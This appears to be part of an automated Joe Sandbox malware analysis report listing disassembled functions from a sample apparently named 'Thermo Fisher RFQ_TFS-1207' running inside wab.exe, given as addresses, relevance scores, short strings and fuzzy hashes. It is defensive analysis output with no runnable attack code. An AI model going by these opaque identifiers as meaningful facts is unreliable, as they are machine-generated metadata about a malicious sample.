lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD1
CharNextA.USER32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE2
lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9

Analysis Process: wab.exePID: 2668, Parent PID: 2400COMMON

Executed Functions

Function 029A9B38 Relevance: 9.5, Strings: 3, Instructions: 5732COMMON

Download Yara Rule

Strings

74/, xrefs: 029AF3D2
7p/, xrefs: 029ACE7A
7d/, xrefs: 029A9BF2

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID: 74/$7d/$7p/
API String ID: 0-3942575134
Opcode ID: 95cd5339288fba4d5a05c2eb5b0184586cfe48fc473699601ba6d4b4dd01f102
Instruction ID: 19807fedcedf9d763f5a5f1f2c3c8496d268e0af0f84a455f72c4fdcb7198227
Opcode Fuzzy Hash: 95cd5339288fba4d5a05c2eb5b0184586cfe48fc473699601ba6d4b4dd01f102
Instruction Fuzzy Hash: C9C32E31D1071A8ADB11EF68C8906ADF7B1FF99300F15C79AE459BB111EB70AAC5CB81

Function 029AB324 Relevance: 1.4, Instructions: 1354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b559b9628e286dd23c26945673cb41364ee071ba6ebe27e91d162939467f753
Instruction ID: c390055d28856ff9b367b650a553cb566888f435cc55fb46d207e98bb864134d
Opcode Fuzzy Hash: 2b559b9628e286dd23c26945673cb41364ee071ba6ebe27e91d162939467f753
Instruction Fuzzy Hash: 97E2E931D10B1A8ADB11EF68C8945A9F7B1FF99300F11D79AE4597B121FB70AAC4CB81

Function 029A4A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4330ee6da711517ac4433efaea4cf5f97dbe52573f6e9978b1ce639142fdf6f4
Instruction ID: 6bb5422a3b6b103d36f237a4ca26ba0bf13448923b387064d4104981791a8f47
Opcode Fuzzy Hash: 4330ee6da711517ac4433efaea4cf5f97dbe52573f6e9978b1ce639142fdf6f4
Instruction Fuzzy Hash: 2CB16D70E00309CFDB10CFA9C8957EDBBF6AF88354F149529D819EB254EBB49845CB81

Function 029A3E80 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4d370fc3d9afd90d4297d08bd62c4f056e1a28022f91bf0654bad76a61e790
Instruction ID: 667605302a78e4811075162f113652b4c2110b471782fa91e7821d7847adf22b
Opcode Fuzzy Hash: 9a4d370fc3d9afd90d4297d08bd62c4f056e1a28022f91bf0654bad76a61e790
Instruction Fuzzy Hash: D2915B70E0030ACFDF10CFA9C9A57AEBBF6AF88344F149529E415A7294EB749845CF85

Function 029A790A Relevance: 5.6, Strings: 4, Instructions: 555COMMON

Download Yara Rule

Strings

d9, xrefs: 029A7FE8
x9, xrefs: 029A7EC8
$ 9, xrefs: 029A7986
9, xrefs: 029A7956

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID: $ 9$d9$x9$ 9
API String ID: 0-2139217485
Opcode ID: 4a67aa7b1307a414d6a4f703aebcf756c7f303644946cc176d38d0fa00574700
Instruction ID: cff1fc5a49e5ad56ee3eab242dda5a414cbec5668a8ce5b12a21100127fde57c
Opcode Fuzzy Hash: 4a67aa7b1307a414d6a4f703aebcf756c7f303644946cc176d38d0fa00574700
Instruction Fuzzy Hash: 2E125D34B112868BDB159A78C49526DB2EBFBC9602F908869D046EB350CF71DD4BCBC1

Function 029AFC31 Relevance: 5.2, Strings: 4, Instructions: 219COMMON

Download Yara Rule

Strings

@;9, xrefs: 029AFE57
Db9, xrefs: 029AFEAD
@;9, xrefs: 029AFDA7
@;9, xrefs: 029AFE2B

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID: @;9$@;9$@;9$Db9
API String ID: 0-1621754664
Opcode ID: b77da9d3d328297b2c031c9d690b21d42b5d42d65d2291b84f60ce690a7085f0
Instruction ID: bb59da928ef25099a9c2c495386d2f3b647461bfb71bc50f2da35daee20aeb28
Opcode Fuzzy Hash: b77da9d3d328297b2c031c9d690b21d42b5d42d65d2291b84f60ce690a7085f0
Instruction Fuzzy Hash: 28719231F002199BDB19DBB5C850AAEBBF6AFC9710F148529E406A7380DF359D06CBD5

Function 029AFE21 Relevance: 3.8, Strings: 3, Instructions: 67COMMON

Download Yara Rule

Strings

@;9, xrefs: 029AFE57
Db9, xrefs: 029AFEAD
@;9, xrefs: 029AFE2B

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID: @;9$@;9$Db9
API String ID: 0-2811999511
Opcode ID: 2faa1fa4639bd57cf2bc9e3dbfcca6a9254944dd6c307bb9cde93780a7ec708e
Instruction ID: 403b6a76bf2753ee468b60e6818e40a12469d2e26111a8782e0cc12c14759a3e
Opcode Fuzzy Hash: 2faa1fa4639bd57cf2bc9e3dbfcca6a9254944dd6c307bb9cde93780a7ec708e
Instruction Fuzzy Hash: 69112932B052545FCB065F74882156E7BA7AFC5600744446AD40AD7392DE354D15C7E5

Function 029AF6A0 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

[9, xrefs: 029AF710

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID: [9
API String ID: 0-1309186338
Opcode ID: 40fb2becc1397cf28aaec6c7c441e5dc76d6c2297266dae6e568814e8df73cc0
Instruction ID: a5c8839e53768ed79703386148c6149c76d66fe12431b7358b286d5b3a6bf736
Opcode Fuzzy Hash: 40fb2becc1397cf28aaec6c7c441e5dc76d6c2297266dae6e568814e8df73cc0
Instruction Fuzzy Hash: 78F08275E012199FCB10DEBC98112FE77F8AB59240F108976D519E7724E232C542CBD1

Function 029AFE90 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

Db9, xrefs: 029AFEAD

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID: Db9
API String ID: 0-2290711882
Opcode ID: 7934454ec35facfca0ca5adda297d29a721279656400c97e1ba819d2b7eca706
Instruction ID: a8f50d4e0d088f061bc3568bdeb8056800e31b9a4a72c1e2c8477986971f1e65
Opcode Fuzzy Hash: 7934454ec35facfca0ca5adda297d29a721279656400c97e1ba819d2b7eca706
Instruction Fuzzy Hash: 28F0E2337002186B8F06AEA5D8419AF3BEFEBCC760B40402AF509D3310DA328D1197E4

Function 029A940C Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 410964b2fa9cbaa8bc8e8d3bec4e6a63da73d87b9f5561f31bdf0bccd52c79d5
Instruction ID: d307edfa82a740176bc53c1e1fe3a3150b94ab2431e8213c53cf53de2776a41b
Opcode Fuzzy Hash: 410964b2fa9cbaa8bc8e8d3bec4e6a63da73d87b9f5561f31bdf0bccd52c79d5
Instruction Fuzzy Hash: 01F17035A002058FEB15DF68D5A4BAEB7B6FF89314F248465D80AEB390DB35DC42CB91

Function 029A4A8C Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dce6d0413e3920157f8de2e26676962b423013cee2910d5cb082061126e4618
Instruction ID: 20d7d119d178b8fda311dc642a284be82ca73df1529a26ad36d6c536f5a98daa
Opcode Fuzzy Hash: 4dce6d0413e3920157f8de2e26676962b423013cee2910d5cb082061126e4618
Instruction Fuzzy Hash: 59B16B70E0030ACFDB10CFA8C8A57DDBBF5AF88354F249529D818EB254EBB49845CB91

Function 029A3E74 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8519508b01f9acfdcef881a6e08937acd4dce56ef80bbb05e47f5aec0062d0c5
Instruction ID: 1faaae6c036a104f6cde01749921df841420a93ec34a44796737ede473404690
Opcode Fuzzy Hash: 8519508b01f9acfdcef881a6e08937acd4dce56ef80bbb05e47f5aec0062d0c5
Instruction Fuzzy Hash: 459168B0E0030ACFDB10CFA8C8957DEBBF6AF88304F149129E415AB294EB749845CF95

Function 029A9898 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7683452e945e0b22bb4d27a3707f6812b665e73222ea29bd3a538f7fb5699be8
Instruction ID: e91986f5d06b528850ab3923799be802d8c5b0922439a63a8a55db040e0a5d83
Opcode Fuzzy Hash: 7683452e945e0b22bb4d27a3707f6812b665e73222ea29bd3a538f7fb5699be8
Instruction Fuzzy Hash: 1C719F71A002048FEB14CFA9D894B9DB7F6FF88314F24C16AE909AB395DB709845CB90

Function 029AF468 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 126b887eee638554281b8290a437c3d9dff2446eedf2c878ed629ed22f8ed501
Instruction ID: 8c63231ae416afa155f5bc46baa90c79c4f1804992ad6dbca669459aeb56814b
Opcode Fuzzy Hash: 126b887eee638554281b8290a437c3d9dff2446eedf2c878ed629ed22f8ed501
Instruction Fuzzy Hash: 5741B131B002198BDF25AE7494683BE77E6BBC8754F644869C406EB790EF32CC468BD1

Function 029AF459 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26de104725de5216cbcb6a573f04f2bc4c3de603d28e74bbe6287ec7a0651c7
Instruction ID: fa5e62e58427448fa78cd130160c627ede16c4faa935adc5814928de95159844
Opcode Fuzzy Hash: e26de104725de5216cbcb6a573f04f2bc4c3de603d28e74bbe6287ec7a0651c7
Instruction Fuzzy Hash: B6319E31B002168BDB259E74C4687BE77E2BB84750F694928C406EBB90EF32CC46DBD1

Function 029A6F78 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85dbd4b8b914a76052b547d31b4a72402fa25db9f3aec70767d9a0bac198803
Instruction ID: 7ed55183229f99d331350818a160982def6d02bd0e5922923475a2d10b94ebe2
Opcode Fuzzy Hash: e85dbd4b8b914a76052b547d31b4a72402fa25db9f3aec70767d9a0bac198803
Instruction Fuzzy Hash: B7313C71E10319DBEB14CFA5D4627EEF7B9EF89304F108526E506E7290EB71A942CB90

Function 029A6F69 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa74ec3ac5623a4e80a2670d9f2ba8c493bba3d650d47c4aa51cdb573d2a550
Instruction ID: 305843d1e61dc0da3beb9dad8df015c5effa18179a368f42aa573f0c84c17f5e
Opcode Fuzzy Hash: 3fa74ec3ac5623a4e80a2670d9f2ba8c493bba3d650d47c4aa51cdb573d2a550
Instruction Fuzzy Hash: 97313C70E103199FEB14CFA4D4657AEB7BAAF89304F148525E406FB290EB719942CB90

Function 029A26DC Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0367cb16fcd2e5797862bbd7e631db7bcbbf326099d659cebb4dd9b718f59bdf
Instruction ID: 0efbf38fe35c62a906e4ac4b2f6e434c2a6107d68f817ea27f4cbe941294b8f9
Opcode Fuzzy Hash: 0367cb16fcd2e5797862bbd7e631db7bcbbf326099d659cebb4dd9b718f59bdf
Instruction Fuzzy Hash: 5A4101B0D00349DFEB10CFA9C594ADEBBF5FF48314F24842AE819AB250DB74A945CB90

Function 029A26E8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd32e5062327d1abb899d3d1520c201ff526c459f3bf083ecd0f99fcfb0d7a2
Instruction ID: f9647f2e858bf8e0c7030199c3d66026a774eeee838a3c0773998cd5978b5b68
Opcode Fuzzy Hash: 1dd32e5062327d1abb899d3d1520c201ff526c459f3bf083ecd0f99fcfb0d7a2
Instruction Fuzzy Hash: 4D41DEB1D00349DFEB10CFA9C494ADEBBF5EF48314F64842AE819AB250DB75A945CB90

Function 029A924B Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e52f290bb2eb53462a462a0a3617976e9c2da0ed8fa627194a48df4c7fe11f
Instruction ID: 7daeff9d0ea8fb50b031441141d263527cfef715d50490a720445e2b0b7cdee6
Opcode Fuzzy Hash: 00e52f290bb2eb53462a462a0a3617976e9c2da0ed8fa627194a48df4c7fe11f
Instruction Fuzzy Hash: 1D317131E003499BEB15CFA4C4A479EB7B6BF89304F54866AE805EB390DB719846CB90

Function 029A1380 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fb84eee27b26746cfa83395dcecf3e602f3789981c5b00fca84a219b60c95e
Instruction ID: 8657a0f6bdcd517989a617e98cce4e87180e7b49e53a0d2379fec5bb8c8e97e6
Opcode Fuzzy Hash: 83fb84eee27b26746cfa83395dcecf3e602f3789981c5b00fca84a219b60c95e
Instruction Fuzzy Hash: BF2182706503419BDF219B78D4A576C37BAE782715F400829E44FDBBE0D728D887CB82

Function 029A16A0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c52a9380b2469a49f73fd66b6bbc6b53a24ca421282f0b46eed72687b5e6f1
Instruction ID: 77bf207799e71a113a6c5033856d57e59108d4f9affb7122b0551ed860cd4176
Opcode Fuzzy Hash: b6c52a9380b2469a49f73fd66b6bbc6b53a24ca421282f0b46eed72687b5e6f1
Instruction Fuzzy Hash: 1531D6346243418BDF11DB7CC8687693769EBC1610F44097AE04FDB2A5D769D847CBD2

Function 029A9150 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563e7618a075e4311bef3f1663a1f0ca1dbce533f10a9c8e389ffda26603e7ae
Instruction ID: a753e70ce3f65b44df56b1077163b0a6776ca4554c61f1158940714827aad351
Opcode Fuzzy Hash: 563e7618a075e4311bef3f1663a1f0ca1dbce533f10a9c8e389ffda26603e7ae
Instruction Fuzzy Hash: C4213235E007099BDB18CFA4D854A9EB7B6BF85314F10862AE816FB340EB719D46CB90

Function 029A9260 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eabfd11f7b74b6425d1de883333509ca82f1e283837d43746aaccabefe501e1e
Instruction ID: 38592beafa56a137b68046dda7eee8d4a4ac744b7c8b40466d483c4810eaea2f
Opcode Fuzzy Hash: eabfd11f7b74b6425d1de883333509ca82f1e283837d43746aaccabefe501e1e
Instruction Fuzzy Hash: 21213030E1020A9BEB05CFA4D4A479EF7B6BF89304F54C52AE805FB350DB719846CB90

Function 029A4F88 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1280450f6d36a7b07dee7abc8e5706aeb75d1249bfb3465dc470f23082ec6f5
Instruction ID: 9e11eaaa722b8d18e322abe3e0c2feb4636824b8274ec20207e85f777fe01765
Opcode Fuzzy Hash: a1280450f6d36a7b07dee7abc8e5706aeb75d1249bfb3465dc470f23082ec6f5
Instruction Fuzzy Hash: E3214630B00214CFDB14DFB8C969AADB7F6AB89704B100468E40AEB3A0DB759D01CBA5

Function 0297D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91534773197.000000000297D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0297D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_297d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707464528f79a4d72a0375f9d2b642f8032d2055083e4286922270a5719c178c
Instruction ID: 1237569af79e8249020ffa049e41b5966af67025cd64aa049fdea6b470b862f7
Opcode Fuzzy Hash: 707464528f79a4d72a0375f9d2b642f8032d2055083e4286922270a5719c178c
Instruction Fuzzy Hash: B321B075604340EFDB14DF24D984B26BB65FF84714F24C96DD84A4B246C37AD847CA72

Function 029A9160 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0432bf89ca510858e406ac297f91abd0a57c32a06865af62f725aa8be0ef4ca
Instruction ID: 232f961475bef71a694652c947065ea347cfbb16bed952441d255930b3013d65
Opcode Fuzzy Hash: b0432bf89ca510858e406ac297f91abd0a57c32a06865af62f725aa8be0ef4ca
Instruction Fuzzy Hash: 42213030E0030ADBDB19CFA4D85469EB7B6BF89314F10851AEC15FB340EB719945CB91

Function 029A1888 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079abfe6ba9dff858122805ea7959260eabd1cf4aa7b3db2d1247b5602f35416
Instruction ID: b981601426595d50523c47d46df2cc86d527236cfbf2b18f93a6deabd42c654b
Opcode Fuzzy Hash: 079abfe6ba9dff858122805ea7959260eabd1cf4aa7b3db2d1247b5602f35416
Instruction Fuzzy Hash: 5D213630B00358CFDF24EB78C5257AE77BAAB89244F100468C10AEB290EF368D01CBA1

Function 029A16B0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3281c1dccaaaca7d50ece8ec17c760461e11fd9c70df88e3614eabfa9783e4
Instruction ID: 92ec289fdc7abae2a953d8631a304ee160e9105613cca6b03a321d397edcdf30
Opcode Fuzzy Hash: 2e3281c1dccaaaca7d50ece8ec17c760461e11fd9c70df88e3614eabfa9783e4
Instruction Fuzzy Hash: AC214D346202418BDF11DBBCC8A4759336AEBC5A14F505975E04FDB2A4DB29D886CBD2

Function 029A1878 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869aadf57acf9c04e58eb309ae0b20363919790ae0728de6ecd82198d175475e
Instruction ID: 98525a8dfb1ea50a98d8115dd7b06fd8461d6668da471155854e019f12232fbf
Opcode Fuzzy Hash: 869aadf57acf9c04e58eb309ae0b20363919790ae0728de6ecd82198d175475e
Instruction Fuzzy Hash: 21210730B10355CBEB24EB78D5657AE77FABB89244F100468C10AEB2A0DB368D41CB95

Function 029A4F98 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b22056c1de04e46ecb4546e18ff0144f47901b4874abe1c55a6c4fb7e9c733
Instruction ID: aa46a900e1652e3a851e67965dfe64166cea257efaeae7f654f79d5d09e6bcdc
Opcode Fuzzy Hash: 73b22056c1de04e46ecb4546e18ff0144f47901b4874abe1c55a6c4fb7e9c733
Instruction Fuzzy Hash: 0F211430B00214CFDB54DF78C969BADB7F5AB89704B100468E40AEB3A0DB769D01CB95

Function 029A0848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d058f2c2e5d5c3751985555013a2ff65715481d10f1c1b1071d861218e191e4e
Instruction ID: 8ebaa1d0d58b4b5b6fb3284fae3e079471e003752ab14802bc6020f00b6587c6
Opcode Fuzzy Hash: d058f2c2e5d5c3751985555013a2ff65715481d10f1c1b1071d861218e191e4e
Instruction Fuzzy Hash: 19114C30B003048BEF649A7DC46476A33A9FB86614F208979E007DF295DB66CC828BC5

Function 029A0838 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48841ca2030fd73c6fbad3a80a0c0c0aeb38ea51cbd69abd7816f86462cd62a8
Instruction ID: 40f79f8384f9d57af81746b20a1add80ea2edfad840cc40654e6859ad661f051
Opcode Fuzzy Hash: 48841ca2030fd73c6fbad3a80a0c0c0aeb38ea51cbd69abd7816f86462cd62a8
Instruction Fuzzy Hash: 18117C30B043058BEF249A7CC4743BA33A9EBC6614F244979D047DB281DB66C8828BC5

Function 029A17C2 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.91535110766.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
